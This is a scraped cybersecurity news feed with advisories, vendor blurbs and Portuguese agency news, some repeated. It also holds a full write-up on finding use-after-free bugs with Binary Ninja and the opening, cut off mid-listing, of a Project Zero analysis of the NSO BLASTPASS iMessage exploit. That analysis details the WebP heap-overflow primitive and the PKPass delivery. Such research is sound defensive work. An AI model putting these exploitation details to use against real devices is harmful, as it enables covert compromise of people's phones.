dos três dias de trabalho intenso, a generalidade dos membros do European Working Group of Competent Authorities on IA, muitos deles participaram pela primeira vez, consideraram esta experiência “impactante e encorajadora”, incentivando à participação de mais autoridades. A abordagem usada com recurso a subgrupos foi um dos fatores valorizados para o sucesso. Huub Janssen, chair do grupo, deixou deixou aos mais de quarenta participantes,  alguns tópicos para o futuro, tais como o reforço de capacidades e a realização de exercícios com simulação de situações reais. Liderado pela RDI - Autoridade para as infraestruturas digitais deste país, tendo como chair, Huub Janssen, este grupo de trabalho que surgiu há quatro anos, visa garantir a cooperação em matéria de Inteligência Artificial, com incidência na partilha de instrumentos e ações relativas à implementação do Regulamento de Inteligência Artificial. Nas reuniões regulares realizadas, os membros propõem temas para debate e procuram soluções conjuntas, através de experiências e entendimentos especializado, permitindo  às diferentes autoridades competentes, a possibilidade de abordar questões concretas e contribuir para uma agenda comum. O grupo assume um papel de articulação e apoio com as entidades constituídas no âmbito do Regulamento: AI Board, AI Committee, AI Office, entre outros. A natureza e atribuições das entidades que integram o Grupo são diversificadas, passando por: proteção de dados; telecomunicações; cibersegurança; Comissão Europeia e UNESCO, entre outras.

https://dyn.cncs.gov.pt/pt/detalhe/art/135920/cncs-recebe-reuniao-de-grupo-de-trabalho-europeu-para-a-ia
2025-013: Remote Code Execution Vulnerability in Splunk
2025-03-27T20:20:37Z | 1743106837

On March 26, 2025, Splunk released a security advisory addressing a vulnerability in Splunk Enterprise and Splunk Cloud Platform that allows low-privileged users to perform Remote Code Execution (RCE). It is recommended updating as soon as possible.

https://cert.europa.eu/publications/security-advisories/2025-013/
Enhancing Public Sector Cybersecurity with Akamai API Security
2025-03-27T19:00:00Z | 1743102000

Learn how Akamai's API security solution helps federal agencies identify, protect, and monitor API traffic in real time.

https://www.akamai.com/blog/security/2025/mar/enhancing-public-sector-cybersecurity-with-akamai-api-security
Inline Data Discovery for Microsoft Purview – A Game-Changer for Data Security
2025-03-27T18:04:01Z | 1743098641

The post Inline Data Discovery for Microsoft Purview – A Game-Changer for Data Security appeared first on iboss.

https://www.iboss.com/blog/inline-data-discovery-for-microsoft-purview-a-game-changer-for-data-security/
Inline Data Discovery for Microsoft Purview – A Game-Changer for Data Security
2025-03-27T18:04:01Z | 1743098641

The post Inline Data Discovery for Microsoft Purview – A Game-Changer for Data Security appeared first on iboss.

https://www.iboss.com/blog/inline-data-discovery-for-microsoft-purview-a-game-changer-for-data-security/
MindshaRE: Using Binary Ninja API to Detect Potential Use-After-Free Vulnerabilities
2025-03-27T15:04:29Z | 1743087869

Use-after-free is a memory corruption condition where a program references memory after it has been released back to the allocator. Statically detecting these bugs can be challenging. In the past, several approaches have addressed this problem, such as GUEB by Josselin Feist and Sean Heelan's work on Finding use-after-free bugs with static analysis. This blog post explores the usage of Binary Ninja’s Medium Level Intermediate Language (MLIL) to establish a data flow graph by tracing interactions between a specific memory allocation and other memory regions. Building on the data flow graph, it is further utilized in context-insensitive reachability analysis across functions to identify potential Use-After-Free (UAF) vulnerabilities in binaries. Like any other static code analysis approach, this one also has classification errors. While acknowledging the classification errors inherent to static code analysis, we highlight primitives that may also be adaptable for modeling other types of vulnerabilities.For readers interested in Binary Ninja APIs, refer to our earlier blog post, which comprehensively explains using Binary Ninja Intermediate Languages (ILs) and Static Single Assignment (SSA) form.Building a Data Flow Graph of Memory AllocationIn this context, data refers to the pointer associated with a specific memory allocation that is the subject of tracking and analysis. The data flow information is visualized as a graph, where:•    Nodes represent different memory regions.•    Edges represent pointer store operations that establish relationships or interactions between these regions.In this implementation, four distinct types of nodes are utilized to construct the data flow graph, each serving a specific purpose:Tracked Allocation Node (Red): Represents a memory allocation of interest, and acts as the focal point for tracking interactions across the graph.Function Stack Frame Nodes (Green): Represent the stack frames of individual functions visited during inter-procedural analysis.Dynamic Memory Nodes (Blue): Represent Static Single Assignment (SSA) variables that cannot be tied to a specific source. These could include dynamically allocated memory or arguments passed to functions for which we lack insights within the scope of the function.Global Memory Nodes (Black): Global variables across functions are not comprehensively tracked. However, these nodes help analyze interactions within a single function.The edges in the graph represent pointer store operations, establishing connections between memory allocations. The source node corresponds to the memory being written to and the destination node represents the pointer value being stored. The edge attributes capture the offsets from allocation base addresses. The “write” attribute indicates the offset from the base of an allocation (source node) where the pointer is written to, and the “points” attribute indicates the offset within an allocation (destination node) that the written pointer value points to. New edges are created for every unique value of “write” or “points” attribute. Write operations to stack memory are represented using absolute values from the base of the stack as represented by Binary Ninja and hence will have negative offsets for most of the architectures. When “write” or “points” attribute is 0, it means base of an allocation. Edges are additionally created during unresolved memory load operations, assuming that the relevant memory store occurred outside the function scope. This graphical representation helps understand how memory regions interact. Below is a section of a sample graph generated during analysis of OpenSLP, providing better clarity on the details described: Figure 1 - Section of Data Graph Mapping Relationships Between SSA Variables, Graph Nodes, and Edges Now that we have an understanding of our graph structure, let's explore how SSA variables are mapped to the nodes in the data flow graph. In our automated analysis, the first SSA variable to be tracked is the one assigned the return value of an allocator call, such as malloc() or calloc(). Furthermore, a Binary Ninja GUI interface could be developed to enable users to mark arbitrary variables for tracking and include them in further analysis. Once we identify the SSA variable of interest, we can leverage the definition-use chain to traverse all its uses within the function. Binary Ninja provides the get_ssa_var_definition() and get_ssa_var_uses() APIs to retrieve a variable's definition site and its uses, respectively. Consider the below C code and Binary Ninja’s MLIL SSA representation of the same: Here, the return value of call to malloc() is written to SSA variable rax#1 and the further usage of rax#1 in the function can be fetched using get_ssa_var_uses() API: A variable points to a node, and in this context, rax#1 points to the Tracked Allocation Node (Red). When rax#1 is assigned to var_10#1, this information is propagated to var_10#1 and subsequently to any further assignments. When a variable assignment involves pointer arithmetic, a piece of offset information is stored in addition to the node. In this case, the offset is 0 because all the variables point to the base of the Tracked Allocation Node. The ptr variable in the function stack is represented by the SSA variable var_10#1, which stores the pointer to the allocated memory. The offset for this variable can be extracted and represented as an edge in the graph. In essence, two data structures are constructed: a dictionary that maps SSA variables to nodes and a graph that connects various memory regions, represented as nodes. Since SSA variables are associated with their specific functions, they can be uniquely identified across functions during inter-procedural analysis. Figure 2 - Connection Between Tracked Allocation Node (Red) and Stack Frame Node (Green) The following code snippet demonstrates the creation of a Tracked Allocation Node (Red node) and the initialization of the SSA variable dictionary, which contains information about the SSA variable and the node it references: Let's examine another example of code and its MLIL translation to understand the process of creating a Dynamic Memory Node (Blue). Within the function scope, there is no information about the location recptr points to. When recptr->link is initialized with the return value of a call to malloc(), a Dynamic Memory Node is created with an edge to the Tracked Allocation Node. This corresponds to the MLIL instruction 0000118a [rax_1#2 + 8].q = rdx#1 @ mem#1 -> mem#2 (MLIL_STORE_SSA), where the edge attribute contains the offset information. The variable rax_1#2 can be tracked back to arg1#0 using the SSA use-def chain. Figure 3 - Connection Between Tracked Allocation Node (Red) and Dynamic Memory Node (Blue) Essentially, whenever memory store operations such as MLIL_SET_VAR_SSA, MLIL_STORE_SSA, or MLIL_STORE_STRUCT_SSA are encountered, edges are created in the graph. In Binary Ninja’s MLIL SSA form, MLIL_SET_VAR_SSA is not strictly a memory store operation since stack writes are translated to SSA variables. However, the variables still retain offset information, which can be used to construct the data flow graph. Translating Memory Loads to Graph Edges While memory store operations are translated into graph edges, as previously discussed, load operations from memory outside the function scope are also represented as graph edges. Consider the following example: Within the function scope, there is no specific information about recptr. However, when the pointer returned by malloc() is written to recptr_new->link, this memory is traced back to the argument passed, i.e., recptr (arg1#0), using the SSA use-def chain. The memory load operation recptr->link is translated to 0000117d rax_1#2 = [rax#1 + 8].q @ mem#0 in the MLIL SSA representation. This load operation is represented as an edge between arg1#0 and rax_1#2. The underlying assumption here is that if the memory is being loaded, it must have been initialized beforehand. Memory store, assignment, and load operations serve as the fundamental building blocks of the data flow graph. Figure 4. Data Flow Graph Developed from Memory Store and Load Operations Traversing the Data Flow Graph to Propagate Information Now that we understand how variables are initialized as mappings to nodes in the graph and how memory accesses are translated to edges, the next question is: how is this information propagated when traversing instructions in the SSA def-use chain? The answer lies in the SSA variable dictionary and the graph that we initialized previously.         -- A direct variable assignment is straightforward. The value of the source variable is assigned to the destination variable. Consider an expression like rax#0 = rbx#0. Here rax#0 is assigned with the value of rbx#0 from the SSA variable dictionary.         -- For a variable assignment where pointer arithmetic is involved, offset information is stored in addition to the node. Consider an expression like rax#0 = rbx#0 + 0x10. Here rax#0 is assigned with the node pointed to by source variable rbx#0 and holds the offset value to the node, which is 0x10.         -- For a variable assignment where pointer arithmetic is involved, the node information from the source variable is directly assigned to the destination variable, just as in the case of direct assignment. However, in this situation, the offset information is updated to reflect the pointer arithmetic operation. Consider an expression like rax#0 = rbx#0 + 0x10. Here rax#0 is assigned with the node pointed to by source variable rbx#0 but the offset value is set to 16.         -- A variable assignment where data is loaded from memory like rax_1#2 = [rax#1 + 8].q, the edges of the graph are visited to fetch the target node pointed to by the source variable. To detail further, the node and the offset associated with rax#1 (base variable) is fetched from the SSA variable dictionary. Then the final offset is computed as the sum of “offset” fetched from SSA variable dictionary and the offset from the load instruction. Once the node and the computed offset are available, we find the edge which has the “write” offset equal to that of the computed offset by walking through all the edges of the node. The destination node and “points” offset associated with this edge are assigned to rax_1#2. Essentially, we resolve a memory load operation to node and offset values, which can be used to update the SSA variable dictionary. Below is the code snippet to demonstrate this: Callees are visited after all the instructions in a def-use chain of the calling function have been processed. A callee is considered for further analysis only if any arguments passed to the function have mappings in the SSA variable dictionary. Recursion is managed by monitoring the call stack for repeated calls to the same function and terminating the analysis after a predefined number of iterations. In cases where stack memory is passed as an argument, the callee is also analyzed if the stack offset passed is less than the write offset value of any edges associated with the respective Function Stack Frame Nodes (Green). This consideration ensures that even if a structure element is initialized within a function and the base of the structure is passed to the callee (with the stack growing downwards and using negative offsets), the analysis accounts for it appropriately. Once the instructions in the SSA def-use chains of both the caller and callees have been traversed, the data flow graph generation is considered complete, with all variable information fully populated for further analysis. Logging Instructions Linked to Tracked Allocation After completing the SSA variable mapping and generating the data flow graph, the instructions are revisited. All memory loads, memory stores, or call instructions dependent on the Tracked Allocation Node are recorded, along with the statically generated call stack. These are considered as "Use". Additionally, call instructions involving deallocator functions are logged and considered as "Free". Below is a sample code snippet for handling MLIL_STORE_SSA instruction: Inter-Procedural Analysis for Use-After-Free Detection via Call Stack Once the logging is done, detecting potential use-after-free bugs involves analyzing all basic blocks categorized as "Free" and verifying if any paths lead to basic blocks categorized as "Use". If such a path exists, it is flagged as a potential use-after-free condition. Since double-free bugs are related to use-after-free, the analysis also examines whether a path exists from one "Free" block to another "Free" block. If such a path is detected, it is flagged and logged as a potential double-free condition. In forward data flow analysis, there is at least one common function in the call stack leading to "Free" and the call stack leading to "Use." For example, consider a scenario where function A allocates memory, passes it to function B for use, which propagates it further to function C, where it gets freed. The instructions using the allocation in B have a call stack of A leading to B, while the call stack for function C includes A leading to B and B leading to C. The last common function in these two call stacks is B. The analysis conducted here is not context-sensitive and focuses solely on reachability. Therefore, instead of identifying a direct path between the basic block in C that frees the memory and the instructions in B that use the memory, the analysis checks for a path within the last common function, i.e., between the basic block in B that calls function C and the basic blocks in B that use the memory. This approach allows for inter-procedural analysis while limiting the pathfinding to the last common function, improving efficiency and scope control. Otherwise, one may have to inline multiple functions into a single graph to perform reachability analysis. Additionally, loops require special attention to minimize false positives. In loops, backward edges can connect basic blocks following a deallocation to those preceding an allocation. Therefore, instructions executed after an allocation but before a deallocation can still appear reachable in the graph, potentially being misidentified as use-after-free. To mitigate this, all incoming edges to the basic block that invokes the allocator function are removed in the control flow graph. This effectively disconnects statements that would otherwise appear reachable within the loop, reducing the false positive results. Automated Detection of Allocator and Deallocator Calls While it is ideal to use allocator and deallocator wrappers specific to the program as input for this analysis, manually identifying them can be challenging. An easier starting point is to input standard functions like malloc(), realloc(), and free(), examine the outcomes, and progressively refine the analysis based on the results. By cross-referencing allocator functions like malloc() and leveraging def-use chains, we can determine if the pointer returned by an allocator function is subsequently returned by the caller. If so, the caller is likely a wrapper around the allocator. For finding deallocator functions, the approach is similar to the one mentioned as “Function aliases” by Sean Heelan. Binary Ninja’s dataflow analysis can be used to verify whether any of the caller's function parameters are directly passed to a deallocator such as free(). This can be identified by checking if the parameter’s value type is RegisterValueType.EntryValue. If this condition is met, it indicates a potential wrapper around the deallocator function. Using a JSON file with minimal allocator details, numerous functions involved in allocating and deallocating data structures were identified in OpenSLP. These discovered functions can be incorporated into the JSON file for further analysis. Currently, the "arg" key holds no significance in the implementation. Since we perform forward data flow analysis, which involves visiting the functions that invoke the allocator call as well as the callees of those functions, identifying these wrappers allows us to shift the starting point of our analysis. Simply put, instead of beginning our analysis inside SLPMessageAlloc(), where forward data flow analysis has limited scope because it calls calloc() without further interactions, we can focus on analyzing all the functions that call SLPMessageAlloc(). This approach broadens the scope and provides better insights into the data flow. Analyzing Real-World Vulnerabilities from the Past To understand how the tool works, let's test it on some known vulnerable programs. Since GUEB already provides a list of identified vulnerabilities, I chose to use them as examples here. CVE-2015-5221: JasPer JPEG-2000 There is a use-after-free/double-free vulnerability in mif_process_cmpt() as seen in RedHat Bugzilla. By tracking the allocation and deallocation APIs, jas_tvparser_create() and jas_tvparser_destroy() respectively, the following results are observed: In this case, mif_process_cmpt() is inlined into mif_hdr_get(), and the results are displayed accordingly. CVE-2016-3177: Giflib Here is a double-free vulnerability in gifcolor - #83 Use-after-free / Double-Free in gifcolor In this case, the allocation and deallocation APIs used were EGifOpenFileHandle() and EGifCloseFile(), respectively, and the results are as follows: GNOME-Nettool This use-after-free vulnerability in get_nic_information() - Bug 753184. For this analysis, g_malloc0() and free() pair is tracked: Figure 5. UAF in get_nic_information CVE-2015-5177: OpenSLP This double-free issue in SLPDProcessMessage() #1251064 demonstrates a different scenario compared to the previous bugs. The earlier cases involved allocation, free, and use within the same function. However, in this double-free case, we observe the effectiveness of inter-analysis. This highlights how bugs spanning multiple functions can be detected, providing a broader scope of analysis for complex code paths. Pointers to memory allocated by SLPMessageAlloc() in SLPDProcessMessage() and SLPBufferAlloc() are passed to ProcessDAAdvert() when the message ID is set to SLP_FUNCT_DAADVERT. Within ProcessDAAdvert(), these pointers are further passed to SLPDKnownDAAdd(). If an error occurs in SLPDKnownDAAdd(), the buffers are freed using SLPMessageFree() and SLPBufferFree(), and a non-zero error code is returned to SLPDProcessMessage(). Subsequently, when SLPDProcessMessage() detects the non-zero error code, it attempts to free the same buffers again, resulting in a double-free condition. The upstream fix for this issue is found here - fix double free if SLPDKnownDAAdd() fails: Interestingly, two double-free issues are reported due to SLPMessageFree(), even though SLPDKnownDAAdd() frees these pointers only once in the code. This discrepancy occurs because the compiler, for optimization purposes, generates multiple basic blocks for the same target of a goto statement. This leads to multiple results being reported. Our implementation does not track the buffer allocated through SLPBufferAlloc() because the pointers are passed across functions via global memory, which is not currently within the scope of our tracking. Currently, the logging is very primitive. Every instruction classified as potential UAF condition is logged individually. Readability could be improved significantly by instead grouping the instructions by basic block or by function. ConclusionI hope you have enjoyed this look at using Binary Ninja to find use-after-free vulnerabilities through data flow analysis and graph reachability. The source code for the project can be found here - uafninja. If you find any vulnerabilities using these methods, consider submitting it to our bounty program. Until then, you can find me on Twitter at @RenoRobertr, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.Acknowledgments and References•     Various blog posts from Trail of Bits on Binary Ninja•     Josh Watson for various projects using Binary Ninja. The visitor class implementation is based on emilator•    Jordan for all the code snippets and the Binary Ninja slack community for answering various questions•    GUEB Static analyzer by Josselin Feist •    Sean Heelan's work on Finding use-after-free bugs with static analysis.

https://www.thezdi.com/blog/2025/3/20/mindshare-using-binary-ninja-api-to-detect-potential-use-after-free-vulnerabilities
RansomHub affiliates linked to rival RaaS gangs
2025-03-27T13:10:08Z | 1743081008

ESET researchers also examine the growing threat posed by tools that ransomware affiliates deploy in an attempt to disrupt EDR security solutions

https://www.welivesecurity.com/en/videos/ransomhub-affiliates-linked-rival-raas-providers/
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 12/2025
2025-03-27T12:54:57Z | 1743080097

This week we’ll cover topics such as the InfoSec seminar and ways to recognise scams.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-122025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 12/2025
2025-03-27T12:54:57Z | 1743080097

This week we’ll cover topics such as the InfoSec seminar and ways to recognise scams.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-122025
Ensuring Long-Term Software Quality in Lawful Intelligence Operations
2025-03-27T12:49:38Z | 1743079778

In investigations, lives depend on the reliability of lawful intelligence platforms. To help analysts maximize the value of all available data, these platforms require advanced testing and continuous updating. The post Ensuring Long-Term Software Quality in Lawful Intelligence Operations appeared first on SS8.

https://www.ss8.com/ensuring-long-term-software-quality-in-lawful-intelligence-operations/
Audi sets the pace for a next-level smart factory
2025-03-27T12:00:00Z | 1743076800

The Edge Cloud 4 Production platform — developed by Audi with Cisco support — enables a new paradigm in software-defined manufacturing. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/audi-sets-the-pace-for-a-next-level-smart-factory.html
Audi sets the pace for a next-level smart factory
2025-03-27T12:00:00Z | 1743076800

The Edge Cloud 4 Production platform — developed by Audi with Cisco support — enables a new paradigm in software-defined manufacturing. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/audi-sets-the-pace-for-a-next-level-smart-factory.html
Audi sets the pace for a next-level smart factory
2025-03-27T12:00:00Z | 1743076800

The Edge Cloud 4 Production platform — developed by Audi with Cisco support — enables a new paradigm in software-defined manufacturing. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/audi-sets-the-pace-for-a-next-level-smart-factory.html
To Meet Compliance Challenges, Focus on Building Great Security
2025-03-27T12:00:00Z | 1743076800

https://www.akamai.com/blog/security/2025/mar/meet-compliance-challenges-focus-building-great-security
FamousSparrow resurfaces to spy on targets in the US, Latin America
2025-03-27T10:42:38Z | 1743072158

Once thought to be dormant, the China-aligned group has also been observed using the privately-sold ShadowPad backdoor for the first time

https://www.welivesecurity.com/en/videos/famoussparrow-resurfaces-spy-targets-us-latin-america/
Clavister and NXP Collaborate to Advance AI-Driven Cybersecurity in the Automotive Industry
2025-03-27T08:20:10Z | 1743063610

27 March 2025 – Örnsköldsvik, Sweden – Clavister, a leading European cybersecurity provider for mission-critical applications, is excited to announce a strategic collaboration with NXP Semiconductors to explore AI-driven cybersecurity… Read more The post Clavister and NXP Collaborate to Advance AI-Driven Cybersecurity in the Automotive Industry appeared first on Clavister. About Clavister Clavister is a leading European cybersecurity vendor with over 20 years of experience. Seated in Sweden, the company has customers—communication service providers, governments, enterprises and managed security service providers (MSSPs)—in more than 150 countries. Clavister provides unique security solutions to protect their digital assets and secure business continuity. The stock, Clavister Holding AB, is listed at NASDAQ First North under short name CLAV.

https://www.clavister.com/clavister-and-nxp-collaborate-to-advance-ai-driven-cybersecurity-in-the-automotive-industry/
Situational Awareness for Eid-Ul-Fitr 2025 Holidays
2025-03-27T06:53:47Z | 1743058427

The Bangladesh Government’s Computer Incident Response Team (BGD e-GOV CIRT), BCC is working to protect the nation’s cyberspace by proactively managing computer security incidents and related threats. As the long Eid holidays approach, cybercriminals may attempt to exploit security gaps due to reduced monitoring and response capabilities. The CTI unit of BGD e-GOV CIRT has recently detected multiple web-based attack attempts, particularly targeting non-office hours... Read More

https://www.cirt.gov.bd/awareness-eid-mar-25/
High Threat Security Alert (A25-03-24): Vulnerability in Microsoft Edge
2025-03-27T04:00:00Z | 1743048000

Microsoft released a security update to address a vulnerability in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Improving Cybersecurity and Productivity: How Threat Intelligence from Recorded Future Drives ROI Through Increased Efficiency
2025-03-27T00:00:00Z | 1743033600

Discover how Recorded Future improves cybersecurity team productivity, saving 100+ hours weekly and driving $290K in annual ROI through threat intelligence.

https://www.recordedfuture.com/blog/improving-cybersecurity-productivity-threat-intelligence-recorded-future-drives-roi
Primeira reunião da FCSAL de 2025 a decorrer nos Açores
2025-03-27T00:00:00Z | 1743033600

Está a decorrer, hoje, na Ribeira Grande, Açores, a terceira reunião do Fórum de Cibersegurança da Administração Local (FCSAL), a primeira de 2025, uma comunidade dinamizada pelo Centro Nacional de Cibersegurança, que surgiu no contexto do Exercício Nacional de Cibersegurança de 2023, que se tornou numa referência a nível europeu. Com o apoio da Associação de Municípios da Região Autónoma dos Açores (AMRAA) e da Câmara Municipal da Ribeira Grande, a reunião da FCSAL na região autónoma conta com a participação de representantes de 13 Entidades Intermunicipais e da ANMP e do CNCS. Na sessão de abertura da reunião marcaram presença, o Diretor Regional das Comunicações e da Transição Digital, Pedro Batista, em representação do Governo Regional dos Açores, o coordenador do CNCS, Lino Santos e o presidente da AMRAA, Alexandre Gaudêncio. Pedro Baptista realçou a colaboração entre o Governo Regional dos Açores e o CNCS, em prol de “uma cultura que a cibersegurança merece e precisa”. “Na ação ao nível da região autónoma optamos por apostar na sensibilização das pessoas, que continuam a ser o elo mais fraco da cadeia no que respeita às ameaças com origem no ciberespaço”, disse o Diretor regional. O quadro complexo, a maior digitalização, associada a uma maior exposição e maior superfície de ataque, foram questões realçadas por Lino Santos, coordenador do Centro Nacional de Cibersegurança. “O CNCS não consegue fazer tudo sozinho, precisamos de nos amparar no apoio, na ajuda das organizações, que de alguma forma têm alguma responsabilidade, alguma forma de influência em cidadãos ou outras organizações”, disse o coordenador, reforçando a importância do alcance e do trabalho em rede que as comunidades de cibersegurança, como a FCSAL permitem. Da agenda da reunião da FCSAL fazem parte sessões de partilha e capacitação, asseguradas por colaboradores do CNCS, das Entidades Intermunicipais e Direção Regional das Comunicações e da Transição Digital. A presença do CNCS nos Açores foi, também, uma oportunidade para promover uma reunião da ISAC Açores, uma comunidade de cibersegurança, que junta as principais organizações públicas e privadas da região autónoma.

https://dyn.cncs.gov.pt/pt/detalhe/art/135919/primeira-reuniao-da-fcsal-de-2025-a-decorrer-nos-acores
CNCS promove workshop dedicado ao Regulamento da Inteligência Artificial
2025-03-27T00:00:00Z | 1743033600

Decorreu, ontem, no Campus APP, um workshop sobre o Regulamento da Inteligência Artificial da União Europeia, que contou com a presença de mais de 20 dirigentes, oriundos de 13 entidades nacionais, que aceitaram o convite para participar. A ação, ministrada por formadores da UNESCO (Organização das Nações Unidas para a Educação, a Ciência e a Cultura), partiu de uma proposta do Centro Nacional de Cibersegurança. O objetivo é incentivar a divulgação de informação e boas práticas internacionais em matéria de Inteligência Artificial, e entender melhor o regulamento europeu e as responsabilidades associadas. O coordenador do CNCS, Lino Santos, na abertura do workshop, destacou a utilidade, atualidade e pertinência do workshop, que contribuiu para a informação e reflexão sobre a Inteligência Artificial (IA), e promove um exemplo e participação ativa por parte das entidades públicas. O Regulamento (UE) 2024/1689 do Parlamento Europeu e do Conselho, de 13 de junho de 2024, cria regras harmonizadas em matéria de inteligência artificial (Regulamento da Inteligência Artificial), o que constitui um desafio, mas também, uma oportunidade para os Estados-Membros, particularmente para as Administrações Públicas com a responsabilidade da sua aplicação e supervisão. A UNESCO assegura formação e instrumentos de trabalho em diversos temas, entre os quais a Inteligência Artificial, estando a capacitar autoridades de vários países com o objetivo de supervisionar a inteligência artificial de forma ética e alinhada com o Regulamento Europeu de IA, permitindo que a IA seja desenvolvida e utilizada em respeito pelos direitos humanos e promovendo o bem-estar social.

https://dyn.cncs.gov.pt/pt/detalhe/art/135918/cncs-promove-workshop-dedicado-ao-regulamento-da-inteligencia-artificial
Chromium: CVE-2025-2783 Incorrect handle provided in unspecified circumstances in Mojo on Windows
2025-03-26T21:55:19Z | 1743026119

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2024 ) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-2783
Enabling the Secure Usage of AI Web Tools
2025-03-26T18:51:23Z | 1743015083

The post Enabling the Secure Usage of AI Web Tools appeared first on Open Systems.

https://www.open-systems.com/blog/enabling-secure-usage-ai-web-tools/
Blasting Past Webp
2025-03-26T17:30:00Z | 1743010200

An analysis of the NSO BLASTPASS iMessage exploit Posted by Ian Beer, Google Project Zero On September 7, 2023 Apple issued an out-of-band security update for iOS: Around the same time on September 7th 2023, Citizen Lab published a blog post linking the two CVEs fixed in iOS 16.6.1 to an "NSO Group Zero-Click, Zero-Day exploit captured in the wild": "[The target was] an individual employed by a Washington DC-based civil society organization with international offices... The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim. The exploit involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim." The day before, on September 6th 2023, Apple reported a vulnerability to the WebP project, indicating in the report that they planned to ship a custom fix for Apple customers the next day. The WebP team posted their first proposed fix in the public git repo the next day, and five days after that on September 12th Google released a new Chrome stable release containing the WebP fix. Both Apple and Google marked the issue as exploited in the wild, alerting other integrators of WebP that they should rapidly integrate the fix as well as causing the security research community to take a closer look... A couple of weeks later on September 21st 2023, former Project Zero team lead Ben Hawkes (in collaboration with @mistymntncop) published the first detailed writeup of the root cause of the vulnerability on the Isosceles Blog. A couple of months later, on November 3rd, a group called Dark Navy published their first blog post: a two-part analysis (Part 1 - Part 2) of the WebP vulnerability and a proof-of-concept exploit targeting Chrome (CVE-2023-4863).   Whilst the Isosceles and Dark Navy posts explained the underlying memory corruption vulnerability in great detail, they were unable to solve another fascinating part of the puzzle: just how exactly do you land an exploit for this vulnerability in a one-shot, zero-click setup? As we'll soon see, the corruption primitive is very limited. Without access to the samples it was almost impossible to know. In mid-November, in collaboration with Amnesty International Security Lab, I was able to obtain a number of BLASTPASS PKPass sample files as well as crash logs from failed exploit attempts. This blog post covers my analysis of those samples and the journey to figure out how one of NSO's recent zero-click iOS exploits really worked. For me that journey began by immediately taking three months of paternity leave, and resumed in March 2024 where this story begins:Setting the scene For a detailed analysis of the root-cause of the WebP vulnerability and the primitive it yields, I recommend first reading the three blog posts I mentioned earlier (Isosceles, Dark Navy 1, Dark Navy 2.) I won't restate their analyses here (both because you should read their original work, and because it's quite complicated!) Instead I'll briefly discuss WebP and the corruption primitive the vulnerability yields.WebP WebP is a relatively modern image file format, first released in 2010. In reality WebP is actually two completely distinct image formats: a lossy format based on the VP8 video codec and a separate lossless format. The two formats share nothing apart from both using a RIFF container and the string WEBP for the first chunk name. From that point on (12 bytes into the file) they are completely different. The vulnerability is in the lossless format, with the RIFF chunk name VP8L. Lossless WebP makes extensive use of Huffman coding; there are at least 10 huffman trees present in the BLASTPASS sample. In the file they're stored as canonical huffman trees, meaning that only the code lengths are retained. At decompression time those lengths are converted directly into a two-level huffman decoding table, with the five largest tables all getting squeezed together into the same pre-allocated buffer. The (it turns out not quite) maximum size of these tables is pre-computed based on the number of symbols they encode. If you're up to this part and you're slightly lost, the other three blogposts referenced above explain this in detail. With control over the symbol lengths it's possible to define all sorts of strange trees, many of which aren't valid. The fundamental issue was that the WebP code only checked the validity of the tree after building the decoding table. But the pre-computed size of the decoding table was only correct for valid trees. As the Isosceles blog post points out, this means that a fundamental part of the vulnerability is that triggering the bug is detected, though after memory has been corrupted, and image parsing stops only a few lines of code later. This presents another exploitation mystery: in a zero-click context, how do you exploit a bug where every time the issue is triggered it also stops parsing any attacker-controlled data? The second mystery involves the actual corruption primitive. The vulnerability will write a HuffmanCode structure at a known offset past the end of the huffman tables buffer: // Huffman lookup table entry typedef struct {   uint8_t bits;   uint16_t value; } HuffmanCode; As DarkNavy point out, whilst the bits and value fields are nominally attacker-controlled, in reality there isn't that much flexibility. The fifth huffman table (the one at the end of the preallocated buffer, part of which can get written out-of-bounds) only has 40 symbols, limiting value to a maximum value of 39 (0x27) and bits will be between 1 and 7 (for a second-level table entry). There's a padding byte between bits and value which makes the largest value that could be written out-of-bounds 0x00270007. And it just so happens that that's exactly the value which the exploit does write — and they likely didn't have that much choice about it. There's also not much flexibility in the huffman table allocation size. The table allocation in the exploit is 12072 (0x2F28) bytes, which will get rounded up to fit within a 0x3000 byte libmalloc small region. The code lengths are chosen such that the overflow occurs like this: To summarize: The 32-bit value 0x270007 will be written 0x58 bytes past the end of a 0x3000 byte huffman table allocation. And then WebP parsing will fail, and the decoder will bail out.Déjà vu? Long-term readers of the Project Zero blog might be experiencing a sense of déjà vu at this point... haven't I already written a blog post about an NSO zero-click iPhone zero day exploiting a vulnerability in a slightly obscure lossless compression format used in an image parsed from an iMessage attachment? Indeed. BLASTPASS has many similarities with FORCEDENTRY, and my initial hunch (which turned out to be completely wrong) was that this exploit might take a similar approach to build a weird machine using some fancier WebP features. To that end I started out by writing a WebP parser to see what features were actually used.Transformation In a very similar fashion to JBIG2, WebP also supports invertible transformations on the input pixel data: My initial theory was that the exploit might operate in a similar fashion to FORCEDENTRY and apply sequences of these transformations outside of the bounds of the image buffer to build a weird machine. But after implementing enough of the WebP format in python to parse every bit of the VP8L chunk it became pretty clear that it was only triggering the Huffman table overflow and nothing more. The VP8L chunk was only 1052 bytes, and pretty much all of it was the 10 Huffman tables needed to trigger the overflow.What's in a pass? Although BLASTPASS is often referred to as an exploit for "the WebP vulnerability", the attackers don't actually just send a WebP file (even though that is supported in iMessage). They send a PassKit PKPass file, which contains a WebP. There must be a reason for this. So let's step back and actually take a look at one of the sample files I received: 171K sample.pkpass $ file sample.pkpass sample.pkpass: Zip archive data, at least v2.0 to extract, compression method=deflate There are five files inside the PKPass zip archive: 60K  background.png 5.5M 